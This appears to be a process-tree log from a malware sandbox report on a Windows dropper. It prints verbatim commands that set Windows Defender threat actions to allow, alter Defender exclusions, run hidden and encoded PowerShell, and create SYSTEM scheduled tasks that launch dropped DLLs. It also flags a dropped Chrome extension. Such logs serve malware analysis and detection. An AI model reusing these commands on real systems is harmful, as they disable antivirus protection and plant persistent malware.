  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:3172
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:436
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:5528
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5700
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5460
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:4732
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:236
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5324
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:352
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5048
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:2420
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5192
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5716
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:3356
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:2260
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4620
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:2468
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  PID:5568
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5316
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:1276
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4652
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5248
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5420
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5096
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4324
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5736
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5432
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5648
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4608
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5172
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5788
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2252
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5608
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2468
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3316
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5668
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5664
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5944
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:508
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2356
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 12:01:02 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\UFfWEUA.exe\" GH /EKSedidyJ 385118 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:3932
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:5440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:2064
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5832

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:5504

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2172

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2996

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\MFzQQXm.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\MFzQQXm.exe GH /hVKedidss 385118 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:3352
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:1376
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:6096
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:5448
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:656
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5520
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:2684
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5112
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5392
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:4660
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:4380
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:4964
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:2400
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:2988
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:2872
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:5132
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:704
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:1900
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
  2⤵
  PID:836
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3312
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:6076
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:4964
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:6116
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:5736
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:5488
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\qkATVY.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:1836
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\gVPPwdC.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5960
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3932
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:3684
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:5208
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3168
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\JCqKiHa.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5356
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5276
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\OFPMIyq.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2072
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\MDLundO.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:404
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:236
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\CLlJrdH.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2060
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 18:36:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\rmqaTvuh\fXMbYfx.dll\",#1 /HMJdidu 385118" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:208
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "rrqYunoktxOQmCoCX"
  2⤵
  PID:6068
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5948
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
  2⤵
  PID:5504
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1276

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\UFfWEUA.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\UFfWEUA.exe GH /EKSedidyJ 385118 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
PID:1752
- C:\Windows\SysWOW64\cmd.exe
